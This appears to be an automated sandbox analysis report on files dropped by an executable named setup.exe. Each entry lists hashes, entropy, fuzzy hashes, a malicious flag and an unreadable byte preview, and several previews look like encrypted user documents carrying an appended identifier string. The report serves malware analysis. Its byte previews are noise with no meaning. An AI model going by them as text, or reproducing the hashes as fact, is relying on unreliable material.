              SHA-256:60242DFBCE41C5F6BD7FEB588FDF81E0FF25E12F943B7C61835D305F9D48E8D3
              SHA-512:F771FE56B22D8CC293939A9BFA11601690765F818F9E4BE6B77056D8B19EAFCABD2BC16640CC0A83C75505D89EDF02230D78F4949A0DE5E8E508C9FC8DB1AB7B
              Malicious:false
              Preview:ZQIXM..._.!..I..:..0g..q..^...F6b.?....YK.+.b..H......Z.xG...]....>AB.T.>.Bz#j.KI"...'.F..!.3..W.$...gt....n..&.<C.E.;..L.o'y.X.]qZ...w...]...B=.9...'.......QaM.W.(..N....t....Wf.v.O.xh........(..fO.._.1.^.o> .....)8...U...~.<p.\-..K...Tf3r....H.....tQ.s....8...&....j....|.5...t.?.gJ............\)05H0:.>.!.B.)#.....>+j....Z(.....ul.....{3....t...u.c......R....w.k.N...Q).T.}......d.....x..u...jj.s....F7..![....w#..7L.t.1......n;. ....@\..)......8k..,....w@.&%q.Z...\..1..l..V"k(.....,.`F.L.O.5O..b=.On..j.......N.z.r.0(.........)...>7...D.g6r'.w..t.M1l..e..:.z5..^...`<(..@B%.+..mK8p5.+.]3......NG4..f....tdJ...|zUr+..pM.AB.k..d..\. ,@5...;..\.....O?..U2t.....L...K...G-....Dq3. .8.7.......-j.0...A.....>>..&."s.F..z.3%>.M.j.,."..PN.#.zm_.o@W...+m}..j..1....= ....uyMy.......4..P...21...}S.Q......`-\..,.v....sm..Y:%.I.r..W{.....1..~........."yx_.......1!.e...p.2`{.c~f.C0h.&.b.|nK.?....qV.z!X..gn..Q..7..gfE .@t#}.Y?...n..".8.Y..\..H..'....a
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.833168803470393
              Encrypted:false
              SSDEEP:24:kPG1cIZnhnUYdTy5h/eJ/R0kHVqDd5fLb5s1cw7Dw4jPUp9OXevczEDjbD:kPGBjnUYdT6c/hYsLPHHOzD3D
              MD5:3E6F1CEDF6BFE2C782CBBE2C2D643EF7
              SHA1:0A0239F76006F44B99EA42D9C3A2D71AD259079C
              SHA-256:DDFEA3BBC2AA2908AD75D66F71279FBC86F9BBB4D668280B17FE55558DB46730
              SHA-512:17EC1D44C6C541FB441B8C7BD7FA1D66797C9F3E8582CE001C1D89A381A13E01C81EF9E0C0FE3D09BFD65354D9FB560CC3AABEA02F6304156C98980B4191800C
              Malicious:false
              Preview:ZQIXM......&..2.i.!.(.MY.-..G...s..h......Lt+x..`R...K.....B.&L?{&.4$.D.....p..|_.EH^-...MJ..bRdZn;Jd...3..9E,...0f....&..+.{..4.......d..q..X1...D.A...R...e.........\I.....O.{.Q.1_..../.......:.9....1..:.V_.K3-.....?.m ....ij.1.d.........8..mv...b..."jY|..A.CA..u..#..N.a...LXb..[....7..SL./.t...}[.?R9..|....v~....' .^.`....UT....*..?.+;C.....U=QB...*..Z..!...z.w.._.`.#.o...fVK.O..EYh...._..g......f.L`.>N....R....x..h...;..... ..4..@....dNN...7...V..S...M".........>.........F...+..QFQ....}..9.%.1Q.'...h..T..}e.@0... ;.<4...X.U.L^t.?.@.j...}....s..p....k..q,.i......Y].......s?d.z..S@I.)..gc..x....RR........E...5E.F.!..N...|.d..r..tn.M.....C+.....^...6..|M.b.....5...{..E!6w.........*.G.....d......?...F...._......d..oo..L..S.....q...cd.<.M...@N...|7.....q3..........AdGP|3Y...`.I.. .P.b..2.3'..p'....e..mOq..3....7.Z....k:.F.ff......}(...{.Cy.1lK..~'..:.....!.....?......3...E._... wA. ..._...9....7.^..#.l..W....@.-.~..N6...N\i.K.j.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):771
              Entropy (8bit):7.68375530276383
              Encrypted:false
              SSDEEP:24:ni56830Y/zys4B4CUCci4uPaffj9WSovu6bXbNbD:isQ0Y/zyT4CUK4/fb9JoFtD
              MD5:B19DF1733E42AEE562BFB9D3CB70EA7E
              SHA1:FF3E4B9D2D384F9DEDE193C474E25297029D5B77
              SHA-256:462203B0F56D3C5DC00BA5377BFA02BDC6303FD7F85E34AB522B661720792121
              SHA-512:5F6E00706E9A317970F8535DE588D1453325F2961ACD33BDCD7D886510AB36B8CDED9FA9B691C2A5A1D85FB4D657D073B95EBF0160228D065D72D26BE0368E11
              Malicious:false
              Preview:<!DOC+.....BN.|.ngQT.J...J..*~...zw!f..@.0.S.0]e\.>...qt..(.&.Q.v.g.p3.y..".=;..7...S......l{.3.9.........)....1.=:W.fig...K....O........qu-9......C.`...z.q.h.7..".H(..'I!..g'....0........6b.^.X.X9..k8.-......:Vr......r.P.zb..^.<.F.P..c.]....?[7m:n$...i.M....3.g;....$.Si"..I./....oZ...$:/......_!...S..Se...._.[>..J.J.=....?.%8._...w.=@....f..e........?Z.(0..N1Y..6.E!U..!Q.bU29...q.J.).J.0...IC...f.q...8....I.X\y..F..Ll.......@Y......IfB.w.q.....>3...[".(.0Q.Uh(..%U.....6.N.Q......SY.>.w....o..Y>.V.=\...$..h-2o...9e.|..&.7^R...?.".(..hK,.....Q..._....N......jD<~...a.$...........RE_Wi........V.$.....9../.L..HU..%....K.n.L...o.ox..C.*j..0.N].....}....`..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:PostScript document text
              Category:dropped
              Size (bytes):1567
              Entropy (8bit):7.8579592563595355
              Encrypted:false
              SSDEEP:48:nBbk7rlF3JGTzolxC7FYBTA4hbKsWJEYfVCZNED:xIeKxyYBTA6KsW9fv
              MD5:51BB2130D54135CB104EC1278CD36F69
              SHA1:63F18FC871FE46D9D41B6E164BFAC0B73D04C706
              SHA-256:2385BA6A985379114D494F6C313F69FA025D3C8815F9BBA654111EB622E164E1
              SHA-512:79C506FA4B334D90CB4C6F28C91286935FF791A526F2196947E12CFCD42E80EF8C6E2D44ED7B9B6A0771B079D5A4B57346A1264021AE03E9A8481E910F806980
              Malicious:false
              Preview:%!Ado4...s......an......%lz...e...d.x.?.k..zs...N.k.5.n.d.....]..4.#]y....[).....1.a..b.3.iAo.t.i.y.....g-m.t.B.bH;2..P6...../....6z.T:u.y.k.b.^Y.!;..m..*n..%.q/..l$.....D.5.......P..!n....XK...c..%Dw.##.$.K...L.j..t%.9q....,.j...$..$.0..5.I..."...f..W...y.......W..7E.>....V........p..S.R.p..X-..M_S%(]..Or.....k..>.....C...q.;v...*.*2'.7U....(v....s[...I.(.g...;}...[t...,[..^.{...AE..u.x..4w.!......h.... ..c..G.b.....T.-.(.. .".....z.Y....}.H..qi]m.L.;.fd...XQJ>~.^....O....\Fz.....'......O6.H..t....ps+.Tj|,....o.$N....I.......z......T..:...2.So..).|P....Aq...H...c.?....m.3..Z.. .}..O..d.A<o..'..{5.....y.}....$.`.0..z..iM.-........'.z..1d^_.Y..._(K..6...t.IDW.=h!>fp0..N..>.GR..B.p.....Pv.\X.....=.!mg..6@./~=..t....E4.....Kj._h..-.....3w..t..O.J.r...`...nut.....OG...jI....D.Pl.S....B..R.......*..)R6#yO...V.......g.....Wqu..M.#....4.}.........g.G".Y....v.O..wm|Mv..+h.."vX[Y.M.5Y...............=5..Wsga....4@L.........M..e-.c...!...g%|...:.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:PostScript document text
              Category:dropped
              Size (bytes):185433
              Entropy (8bit):7.8775461475313975
              Encrypted:false
              SSDEEP:3072:pvM9wQKUYuUY2nQshm1DlAvStMpxV0KaAvqDTF23GxXE07ZmandGCyN2mM7IgOPv:xM9weHJculAFxVBazd0cXE07ZmandGC2
              MD5:DF36567C2453D6F6F32E4ABC9A61B480
              SHA1:828809F0DAF77656D92DA9FD9EFC153DB62CA5CD
              SHA-256:1E09E9B42CA2414DC86F2278BC78D3D8A10A1925B44614651D2C6A53EABE9DA6
              SHA-512:56ECB06C089F252E8D65A6DC130EA0B3CB824073DBE73299F7E7AA3448715F70E48E389EF21F58580A1189B2D587400A8578590149777B2661B717B35316F33E
              Malicious:false
              Preview:%!Ado.....`.....'......3.$...^......?.6t....Saxyc......W+.../.......=.|AX.....{..5.wF.....G..H)..2..1.B.".(.....&.h..fm..J..9.y.S.RW`^....3../m.W..}..BA..&..D.....*.e..r.vQb.....#Q.O..Q...3.lY..ff..h.8....Z........M.Pn>..P........J.C.......T.4..1..L...z.d>V`..~O.^j...d.D.,...F..)...;.Z.r...9].$..v...O.p...-...57d.G.V.Ze.......?..^.Q.}.r..y.._(<.=......^x0...u.9..6..b.&..h[\....F..,u...c.....].?6..@7{*l.T,D.8].c..@...L.$kL`..@.GE.QRT.V.n....V.)P..mA..._..L.^....:..z.....}.. f....W...[5.s. ..H=....6J........Z-..n...e.......>W........C2..A...A.J.}.E3+.Ts....J..D.."0...G.=...X...P.... ...er.[..}p.....8. ...m....d...!....0.5...3?..f.@..Z.._N.!.4.A.....bR}\V.X.bV...........U.O....QY.G].@..t...g"4....3...F...1_|.p..xc8m....Q.U.J....)...>P.~...E+.R..............Q...(.t....#.....q.]Cn..|>.X.3..U..)........H..c\.0.....R;..`.....&..:,..NO.....t.g...t.h....-.Ve}..iG.Z.TL.fG.......y+...n\+X.......eX.v...M....S*.|..'N.....J,..CZ,..1..Pv....d.L*.J.18\..(
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):227336
              Entropy (8bit):6.985751692437521
              Encrypted:false
              SSDEEP:3072:SAcRBZzTUMeJfwjVlb5hB7n7rmUbaTKORP9Ldpbr1gTHsrk9fdOoWiRnr:RE/zInhwntHLadP9L3mTMgRnr
              MD5:C270FB2C137E8ACE6E2F686BB574B863
              SHA1:344D97ABE923F3FA2BDA3AFB9C002B3DC270111B
              SHA-256:7BBAB6082A9F4DEB0818D4FA7CC85EC6F6093DF0BCA9E8A8A2F9EA0E41B31D96
              SHA-512:16A007E39C44057068802901D8468DB91AB7DED16C6E3B48A85022FCF52FD353015CFE554C0BBC63D5C5C0D86FA4337B6AB7544E278FA3B39AA735CD317F69B2
              Malicious:false
              Preview:Adobesr.........Y.'..;....l..H]Fz..5.k.F<..`..(.E....|..._H..BBp..*..9......D.....~.z...]..c...Z........Nu.z..9.....j.D.....J80.....OY.:...G....,1.4..[.4$......*.}..r.+.Z..i.....B..A.v.Ft|B,T?...e...d.......=Y:....M...4..7.......".&N..&...S.+.....\u.q..t..|....?x.u&6....K.......qM........M..m.gf...SKY.<.-..i.b..`>d......,xYBz6.p.o"p%..u..(......F.>.W.?..Q@..V...7.t\.t........^....O....A..:....].8.....w.-.7K6../...jIt].W...xb.......XQ..<4k0...].jxs;...$.m...=.|..i..9......U.h..M.>..RX.......l..*..p... .J...1b1O$......o.{.g)4.......;...R.{....>.E..\=...)....-..&BO\.M(p.d..{..X.......P.:...@>I..N......U%zys..,.F..d}...b..|&l.....%..}.b.L}AU...,-!...Y....4.."......yt&...\6MK..Y...I.2...t......[.n..~......w...2..3.Bce[T..4..7T, G....1.e..G.H`...K.>.M.{.._F...t........:.......%........Q.;.-:B(.o2.....k;...q.F......t2d...q...h,9..h...aH......c.|...|........>/._.eSj.e..[.......kX.W..4...X.2..^....AJ.q.b...../_....5..jvz..E^3..B07_..".9.I
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):67060
              Entropy (8bit):7.997310389453529
              Encrypted:true
              SSDEEP:768:lf1hC6wQ6KULQVmwtylHRxW/akeQpzDexyIgkndDJ9r9iZFQuxk3hHhNGKcw2g:demUcQw+HRxWyyp0ndIjQus2m2g
              MD5:48DA0BD72B92F1930BEE07A323EC7D8C
              SHA1:FA1FD39263A43B8CF1A127835C0703BA36C33D0C
              SHA-256:D89CCBE165C3513B6306C3DF4187382BD3AA6EFB0CB036A12C47232DC681C33D
              SHA-512:6E7A498A39BAE0139C374729A5B7E4F5ECF149E0CF3D8706E329A23FEB650E6A1E2D49FE0136A65255B7586FB1498C08AA94BED5298F3203A428F3DB7DAC8A8D
              Malicious:true
              Preview:4.397y.B'...l.S4s.~.4.&.W..d.=..A`t/..:mh`}V../....A3.P[...w.h..W..t.i/Q+|....=._.i...+.F..s..+M. ?2..().h.)..p.`.."R..V..ZG....f..R.K..Q...k.&k..".G....FI....@;...V.;J.?..#..]SmT.<...."C..*.....$k..v..;...7._M.|O..L....m38.yc...od${..6 ..K....W:.KkQR[.T...)].Z..<).H..Kq7y..Z..9M2.8..9[..-......l0.....w......pj.,l.y.kQ.Y%4...7\.L.......M.m..f.....9..xT....*..w...5..M.7....vwC..D/k..............h./.D..)....`v.......D.y~B..c.H..e8....V..c.....y.3..`2..)...m.soiy..|x..c..{.>..U..A..3E...k...). .{..........}.!_........5_..8.&x...G.......A.E.J<.5A[ |YI.0.....<.t.v!+.X....$....=/0dl....cD.A#....[.pJ..sC..=.=.E....g..V|.......E.p.....Q....+K.<i...}.[...w2...*...Yf.I..!...H...r........`../.I.1...9..}.m/.SZ.. e....{..C...P.Z.kfO.......'......]|.S{...../3...y....,...-.!.....>......9..e.....R..Cx..L...&W...$..7.t..7*.$k....D..&T?.(TJ.....GEy...zv..a ......).........N...|.\.OQ.4DS.. .>..$(e.I.,..dG...)g....Y.'4.....e.....z.).....!.~!......z|.Xh&%.?..W...y
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):49486
              Entropy (8bit):7.996916361028879
              Encrypted:true
              SSDEEP:768:cWnJw9IpTbE+Yx3qkxbwqecQPSHgmq9Ttg1trnk9tdg6uvcGrCi52tZrVP/4nBld:cWdJorDxUq6PSnqc1mNfo52LalPeY
              MD5:415E33830AF3C18691C07DC62A4A3FDE
              SHA1:6808294BE4BA1B2BA347E067EBEF0F97A85C81A4
              SHA-256:7B385FA463BA3D9AAF3D732325D579FF7F56E3DE959D44DAB452DD8F7D2B0795
              SHA-512:7DDE18D286512409467A4D8A865BAD24FD73AE7676E98DBA7CA6102D4985FFB4C893C88BFFF9E3BCC6A3C45BEB207A2EE493FDD9DCACA2CF8299D24FB402CF39
              Malicious:true
              Preview:SQLit..0....o}..\...<.m..2...e.....9E....[.xbA..(.@.....n.`....?d...@C0Nj..)$Q%....t"/Hak..u..H..K.6...K..O... .....w:.!.....6...7...B.v.h2..u...TI.}...[pH*.K*..x.)Z..}+..-..3........A...t$..>qK...0o....!=]..-X{.P;.k.O......Lp....=..\T.$Q.J.^..M.}..K>..>140...3(....1.]9.qv3g....Vm... .7.V].p...,.!b....2U..\..G....ax.J.........)'0.D....um.4.e...9..........f.Jl@8....&|.@j:bS.5b~.u!.f1..F5..S.u!.4..u.?.4...9!.M.a,./6........n-G.mB...RV.KL. .......[F.|Z...|1.pb.X`'.l.(.o..v.r..=..%dI..../.a......*|`Sq...*......6.....c.....%..Z.....M.[....{...*...^.h...?.iH..C.Ye/.K|..^\..v..b..../.o..e8..0.....F.o."W3\...A.\.9.U.]=..4a-.D.^d...7S.vx..G....ED...>rf.d.nF......r:m.h....Aa.i4...A..;...I..Z.7...w.LU...+.........=.Q..&.aF.H........3.Y.P..]..u(.S..4._N.Z...z.9...RX......;o.K..B.....I^.^....a.2f1...O.Q...e.Y/#v,.).....W.`~O.M......OE...>...D.....L._..{.... .l1.SWU..V....9st.Z..k?...]W.1]..(.e:.Oe<;..#o...\E....h-..PJE.....^.i.....G-4...`.S..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):354
              Entropy (8bit):7.294373861042936
              Encrypted:false
              SSDEEP:6:QGm7eQBCws7Cb54gomjPUqI8wU/dI67Z8eYVio9jtI70ZzQKmWsXkNR2cii96Z:QGm7eUAumg1jSUys8eoj9VQKdsMR2ciD
              MD5:F6182CEEF6FCDFA5E45286F1E133FAA7
              SHA1:CCC6EA78345822F4F02264F5953EEFC8413F09D3
              SHA-256:19A1AF9DA8ABD44C0151EA65456363EF2E8FD132E07161BA1F854DB29D2935F9
              SHA-512:BBEDF9CFDC74DD957009D9DDF067663C3EAEE4111258EDED5E300F3515EDC6218DDD104461BE5BCE280F8E666D82B752E095BF9BB69002A6ACE627AD4F50683D
              Malicious:false
              Preview:1,"fu......+..\.U5..k....4..YUv..O.H.. ..-.<. ..)\..{.@.kB.M..[..`<#]jF.r*.id[....#4}.*...Z.aR..<.3Y.2.......S.S..rJ.3.........{.Yd..w...#q.|.CH8v..9.?T..1V..{W}.Af..l;.1..d^.......>t8..l._`.0p.....l.6...".[..:P.am.0..H....-...v.9.!.....&Z/k..`...s..v.........t.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1554
              Entropy (8bit):7.870711234909136
              Encrypted:false
              SSDEEP:24:0119Vi6Gt2TM5rCA7RGg8n3d/OMK2ve4NE0hg53jfXbD:K19IbxJCz3dvtvBN/W3jrD
              MD5:E09D347C6486396C17EADCA89AA4DF00
              SHA1:70237F18F224C83504B8AEF15D442A793B938EA4
              SHA-256:A4B2F81AEBC093F8EE2CE773F50165AFBC4FFDB586B06D167927A49230A84258
              SHA-512:1622E5730F81E992B591AA354C5CD26B56FDF7F5C0F977D1CF413562BA244B2E2EA2BD3546FE2FC5AFFD4DE9612239CB8225559246224B273DE52C4542343519
              Malicious:false
              Preview:1,"fu/.8$....n.......?r.E..I`a2. 3.\...%..+......N=.Uk..'.F.u'..~/3K.+.3.....A...r.....M...a6.qp. ,..oK0.Y..|W..|....u.f..9;l.q..L.U...z^.r~.:^5.f$Z*D._.... ..\.V.R...\..b...y}1..}..m.A.x.8.YVp.b........%.U3..(N[..o....O.I.'N..$.62...1..>.v..z6b..^.._...*Bz........f.{[...2..3.fTh#...Z.gC..]..B....&m,xz...c$..G.V....!t...x....D.eM.Z.J.5.[73.........Ct.F...:p.Pr..1..9;....w.G;1.X..O.9..%.G..&...Z.J.N...\....&....m..Q....rE....(../..EFl..Hd?.....G....`......G\..uO......b>..:......Vq|.N.....Y......3%%X....7...>U..JZw2k."pB.q...|...Y.hv }M......^Z.bxb....{..(. C..im...i...C..,.u..`..h...G..v.Ne..E.t.O.....D..V....."..4'....n":GX.]u"z.QC....D*.PPm...}.......3..7C.*8.....ar.....R......N......K.=.>..D.qk..P....|.......^..L.:..G.g.h..j....>.WlZ.l........5......3*K..jut\m|.Q...".........o...,....2$.Xp=B.\y....(../.Y...@M..3huV2^$F....x...a.....s..*kk.].@..c.P.6Y..}...E&...-{.t.vKi.v..&y..@.6...r.p..i..k.../....c.}.6......HU..T...56B..fx...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1952
              Entropy (8bit):7.897284506871916
              Encrypted:false
              SSDEEP:48:YCYaSG9FvLWOLhu+1hxQZQZHZNVRqCNn2ED:YC4MTWOLhh1j0EzVV52Q
              MD5:91C1CA5CC6D3EA315308419F70745112
              SHA1:717D0F333BDAC3F5780114E365012A1FDCD17DCF
              SHA-256:08D92C8C15C2309E96194E0824F8D51B15A1103D2CB216D1E04C61A73BCD544A
              SHA-512:56C219DC9C1F3C7CE898FBE133EC9F5932C5773852699532765B8838557AB9A906D29A50C63A69ACC52CB72092DD9C9D05FB5B2F39C68779B2AB1C082526F8AA
              Malicious:false
              Preview:1,"fu..Q...NL....X.B.d..o: ..A....v..?qn..y4..2P.....RL....c.e^.....Se..d.Q....GNn.vHV.Jx.a|.y..g......=o........m.........S.@.n....Z.=..C.(......J.M.mbIb...:ko.9.DT.f.=..}<..H(y.T....LSDx.....sBK....._.~,...Q.^.Ue....d..U...._.U......r.k$WAVnM..a.$"...[.......3`...n.....E........h{.].=.......' ..(.M.v.....\.V.p9.oJ7D........H.7.<...r.Z.F..L...j.m....6......#!~.Ep./..F...b7[..&7...n._.d..>h.1.r0H..:....H.".....(.K.E......FZ.2.`.h.t.BU.9..SQ......&.t..R.#L....Wd.3.......!_.j_&......D.lf%?....A..............s.i...z\^......X.d..X......k'4.......#.6....H.0=..O/$.X..m[.....E.I.......=.....+...7A...U.b.u}.R.iL q..L...z...4.l.}7...Z.j.....jIT...+.....H..M...`....'.....|..|^.~..[.>...5.g..K...(.V_b..(....~W...|.t.9_..X`.]..k$h..b.....8kB.x..M.....l,m.@....]...rl.u.28...I....Xr.,#.:b. ..6.Yt...bS...E.E...FW..A..8.@....,..T.mO.|........3.e....CoB.eJ^pc4..#.8.G...nBz..JR.. ....."K.^....~V..:.1v.......r^.C...rN.q..............10...*.....#.....-.pj...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):4194638
              Entropy (8bit):0.5183966825013012
              Encrypted:false
              SSDEEP:3072:gciZJpkeXpeEksYlAfer5KwAT6da/v524fq2Efm6c9ZuIlBb8M:FckVizDRvcx2EM9Zbb8M
              MD5:B0A423B51907B454F34A62248ADE8B58
              SHA1:552D09D89660DF4D5C72422210F90F885C750386
              SHA-256:D42AFFF6756E63A273887CEE621E1074E57BABB2CFBA80ABC109D8A2433F0B08
              SHA-512:8759886110BF864624637E7191D6B103E1B1E231573E27B1CE6D1C99D8AEBCEDA906C765EDAA46E69A71253549A2826B8EF8AF834D8EDCD26EFE9D6BF2A97101
              Malicious:false
              Preview:.......=....GVk\F..b..Qj_......:..7.7.........3sKJ...=..?3..v..y5*.9Mj.QL.[..E.H.0..v.F.~C,+.)..X!..Wa..L.ce..I.e.7...a..i+yP$c.v.$sC..hV....'Cc..2.P...]..!..Vq.3....I]..S..o.b.?z..x.o....e..+.Y^H....\.]..N.ed:.(..QB..a.,.}...+.......`..r4.............&......_bl..0AS......n.....S.h....RR.'...2"e\ .0.........Y.?d..k.q.O%.v.wG.P>b...Y....xL......p....[.."`.T...S..'1%..Bi..gw.I.nAE..u..A...c.(.....:>.zZ.0s..9...c....[.. .....R..bo&] ..?...../..\.Z..+.-....]..~*...D...9..'...+.X..c*HL2n...G..1....RZ...............1.......s&....'.i.9.vZ ...+v3X.t.."b.W..@)h`,.\.d..hR.I...4...n.7Z...N..FL.hL.@dye..V..v{.....t...gz.j}8.........P,.........AX4.%Z]..s...S..1.r....Nr..i.b....!-f...,s.$..+}..\|....%c..K{..d<Km.c.7..2....Y..1.].1...k.:..t.O..!.....j.7J+p_...R...D..ZT{.I.H..%|.Z........I..~..8?i..r.q...."..t..;.......X.KJ@.>=.5a.b....Ry.....z|..Lwg...T....R.{;1..uN<.0CW0x.......{u..LQ[..4.U..!..G!......:3...[{..>....W*;.bj.h.U)...C-....rX.z.Rv
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2203
              Entropy (8bit):7.914612969638267
              Encrypted:false
              SSDEEP:48:7qkSEUQRJEfekK24Gbq8WXof1uqdMJJlVt4D:7qmUQmVk61pdkJlU
              MD5:097B044AD68B8C39A5F82CE5A9E1A415
              SHA1:9985DB09554AE1B7861376E53E732E85E70D79D8
              SHA-256:C7BAA5CDB1FE4C9D7B109ED59865769E0ECB21B8F6E3BBD09487CAB66E0E3CA7
              SHA-512:553C8C6EA12FE16F97BCAE4BA3499E413952B6FD034513B159209B582A4DC3488A2268F0EA7709C000BCCEB31B202A8D0C9B1F8CE370403A96D28593068AC323
              Malicious:false
              Preview:<?xmliv@G.)..m........c.........~.GX.......I.zg_W$.._..&..X....e....6.d..,L..+........-....A..S...X..@7....\..E<^..?......i.e..f....I.....D...S........#..q.JY..C,....,Q.cC@.A.....}IL...H..;.QZ.s.QE.I..?......K,Q............QCV*...y..z7........[.......<..*..z.$....%.#.i;\Eg.....E....q.N...{....l..SM...../Ux.......sH~i.0...?..T... .1.<o.7%...t....^......n.X!..Id-.}.......^...v.......X"^.F-.`..].k$...~.A._.,.Tj....7.N....X..}..<..........Ag..yh|.$*..E..b~@*.x&(..[..9........-.+...c...#.Q.M.-uB...q..E.^d/>k..T=B.F9I...7nX4..N...V..$.fX...\.\.../...!rc<.!.Z..C..$R......^.a......_...|D....*...h...K.m .5.`.L9..i>2..>e.....c`.....&..._*.pL......[.sQ.8}h.7Ek..(`....Q.cKQ..t..yCm]....f.Q.Y.-.Y.....l..R...k.Q.EBy...-..5.:.EI.._.^...v.7.,.lQ,...7.L.~...?0h!..H.GJb...".V..u"../#.b.aL_.%.Gy.G...!P..6...........{.(U.`.w.Y.x.....b7y%....g...#.iv...Z..%.E7.|..T.NzW....9.(-.g.G."nO..0......Z.R-..Z..h.n...=..2Jl.>..`.b..z$..Sg|:.n...f^}...Q...KgU.?o...o.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.9775117078827575
              Encrypted:false
              SSDEEP:192:sJQEJHE9yhgxeIX8StP2o9kOpDV54ckcNUNMC23R:sJvJW8gxrLtZ9kOhVycX91
              MD5:8E2C69452E85C19F15E8D7EF9EA123C7
              SHA1:2CF457B0D45FBA038ED490E25C4ECC7790263058
              SHA-256:D717F6BFE7680F5839A7189ACA92319D7DCE2E66DE0575629D52961482575AF0
              SHA-512:24E25DA2E08EFC855BD0F8D417ABC21694FAEF6C1CE47EF9945FCB6BC3A06EB274A780080326DAB350ABB7BBE2B55E4C6F1912DBC1424191402073FB4BB721BE
              Malicious:false
              Preview:h..F..Sh2BV...w..\V0!..b+...B.S.k..|Z....4.^.9......+.....X._.l.....|.......K..L..~+..?..+.&.).. .J.#.........1F.uZ0,..\....,/`.P.y. .%..U..u..p.._I..K..N......I.k?5..&x.........q. ..!.5y.....S...~..D.O........y..2....G..."]...L).0..6...y=..@.....cJ.t..a4..L.......'7]....y<.f..?){.~|....-.g.j.....N8...W......0...1-J\^.....(\..y.v.m.r/C.<.K9:.A.h.yi...EcX,.}.....V.lfYV.c.,@..o.%3.../...>..Zf@..E6.....u....ms.5..ua..`7.......-..WX.r..$.%.:M.]......P.g..{`....dZ.dE.......@ .;.!..;i.T9f..2P^.da..."nY..+..A(..P.....W...4..h.;.s%..<.E.\..gh\3i.}}.+.W.o*..=....W.j.R.....vj.!H9.,....C^i_..>.].s.<r.~.S......$Z....C6.........N.n..Z.*...p..\..F.W.Kxqq....s./@.@....k....~+.m.J...H.] ?...jv6l|..~gP!..Y.sQ....>9....^..;.."ee..+.+....E.L.w....h.4.k.-.....a..........+.e..y..D.)lS.8...]..e..U=i.....S#..t.*....:m.8.....=w.<.L.ZW...Ja...........+..]W....Z%G..MW.S..7..-..7.6;.g..K.n....h..|...t. :..>..l...dX..%O..4&V..~O..,.!.G..O..9..-..k.D\?..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):3.9624619457721924
              Encrypted:false
              SSDEEP:3072:jhubAQBbip+18MTMCR51FSaxglCW20RQbxMHwJmp/1dDyJVaYnBI8BKw4orPVvYM:jc/bq+18H2XSygCW20yOwk11pGD8eTN
              MD5:7F56058D05FB33F09F50C4BE29402A72
              SHA1:C1B331057BBE57CF8F70ED0FFCAD6B95B2E95595
              SHA-256:4AD143AF983B30BA400D989207FBB73091BB4DF8AAED39AA4D96BE9EF2CE232E
              SHA-512:4533EC6B02180B5126E1EBA0B74935136DEE0E21613F8774799A8CBF881FAF9D5907E81AFB7AF2537A2DEFCDB94E4ECC22F3581E815F0DAE71086CA9866F9CBC
              Malicious:false
              Preview:.._..!..Td...>.t.s....w.".....r,A.z.S1X..L....E]"s..i..'+36...q+...._b.s....h..q....nrp4......R.h'...Y6g...0I.L@a!.......D.Kf.1..=d...........I%.T..}..V.h2.{.J..o.F..h...).P.6k..3s....I_|._t.....N...f.9.$...F..4:;z*.,.@fq~I..u.A..{Gw{.d...<..H8...&...K...'... Xjr..J.e;.E........`.~...rD.i..).,.F......K.'=....[v.I....+...X=.s..D.LV...P......t.]../n..O..%.....'..H...2.O.tr.............NQ ...O.q......y.{.L.D..+....m.~.z..x,.r...(...HdQ....Y..g.....q}..+S..S...NFz..K....j......[.-p...].8e[...(..].%c.7...P..C.f.....*.;.....Fg&d.O.!.-.p.%x....@..GK.....l..s.....`...S..(7n...u.&.yS...51.........M...[..........l'j.:....d4.;.....9j`LKRc.....:.F.N...1d...s'...X....bL..e...LR.C1p%..hC.k.E.o....C..`...e.{..Q..o.2.......*)s.......-.h.+....Q5.\. n...o...ew."..?..Ah.F|>:Y.......t".X.....~.t..@yhY.....m...j-...S.eGn..h..T....uu...Y.".P........Y>1`.....h..<...*....,....~._!yy......V.Y...P...ONp..d....6#..$.....bC.....n..-b.....e\......a..U#.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):3.208333138184473
              Encrypted:false
              SSDEEP:3072:PEpVKgLBZEWqisE7ZRqdcF/Ta6jyFMIQirdrBFIg43EDGNBDj0FGZKS0:P2VKgHE5E7ZMd+HWFXQoxoEaXva
              MD5:8782776E8E0D6C60D3FD354F577628AD
              SHA1:32679E6B5B95A0FF5B9C06E6D1A5A2901A1CEDE7
              SHA-256:13E7DA1F8CF3A491612E30961678522EEE99C3922F52F3F98543BB03E5044D20
              SHA-512:C10D8A0C559F2C6F02EFEA426160920011DF5CFC0768162B3FD46D9221CD82EFB3830480B2127C522CE43A19FBB1F19DB62E48FDA8BD453DE0BBC8ADC3B8B392
              Malicious:false
